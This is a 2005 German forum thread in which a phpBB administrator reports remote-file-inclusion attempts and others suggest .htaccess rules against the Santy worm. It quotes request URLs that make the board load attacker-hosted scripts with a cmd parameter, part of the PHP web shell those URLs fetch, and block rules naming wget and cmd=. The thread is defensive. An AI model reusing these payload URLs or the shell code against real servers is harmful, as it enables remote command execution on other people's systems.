neue Wurmform?

albe · Beitrag von **albe** » 19.03.2005 12:33

Hallo,

ich glaube bei mir gabs einen neuartigen Wurmangriff. Bisherige Angriffe wurden mittels .htaccess und Mod rewrite und dem CBACK Mod ausgebremst.

Nun steht im Log:

Request URI:

/phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id

Kennt jemand von Euch diese Variante?

larsneo · Beitrag von **larsneo** » 19.03.2005 14:43

das sieht mir eher aus wie der versuch, schwachstellen automatisiert aufzuspüren. iirc ist das z.b. der payload bei einigen santy abkömmlingen...

albe · Beitrag von **albe** » 20.03.2005 08:11

Wie kann ich meine .htaccess anpassen um auch diese Anfragen zu unterbinden?

larsneo · Beitrag von **larsneo** » 20.03.2005 08:50

wie lautet denn der vollständige eintrag im log?

albe · Beitrag von **albe** » 20.03.2005 09:09

Das ist der komplette Eintrag:

18.03.2005, 12:15
200.165.125.85

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) /phpBB2/index.php?c=http://lenoba.tripod.com.br/scmd.txt?&cmd=id

sieht so aus, als ob das jemand direkt auf der Website in seinen Browser eingegeben hat.

die hinterlegte Datei hat folgenden Inhalt:

&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";
echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
}

?>

albe · Beitrag von **albe** » 20.03.2005 12:35

Heute schon wieder eine neue Variante:

/phpBB2/lexique.php?lettre=http://www.zenobio.net/lila.jpg?&cmd=id

http://www.zenobio.net/lila.jpg?&cmd=id

Seit Google die Beiträge aus meinem Board aufgenommen hat gibts mehrere Angriffe pro Minute

larsneo · Beitrag von **larsneo** » 20.03.2005 12:45

da mir keine aktive query mit cmd=[...] einfällt, sollte folgende .htaccess auch diese anfrage ins nirvana schicken:

Code: Alles auswählen

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

albe · Beitrag von **albe** » 20.03.2005 14:45

Ich habe die Zeile

RewriteCond %{QUERY_STRING} ^(.*)cmd=

hinzugefügt. Damit dürften diese Abfragen nicht mehr erfolgen.

Destruktor · Beitrag von **Destruktor** » 04.07.2005 10:03

Wenn ich die .htaccess angelege:

Code: Alles auswählen

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Ist die Seite nicht mehr erreichbar (403)

TK · Beitrag von TK » 04.07.2005 14:59

Dann ist mit höchster Wahrscheinlichkeit das PHP-Modul mod_rewrite bei dir entweder nicht eingeschaltet, oder gar nicht erst erlaubt bei deinem Anbieter... Frag deinen Host-Provider danach...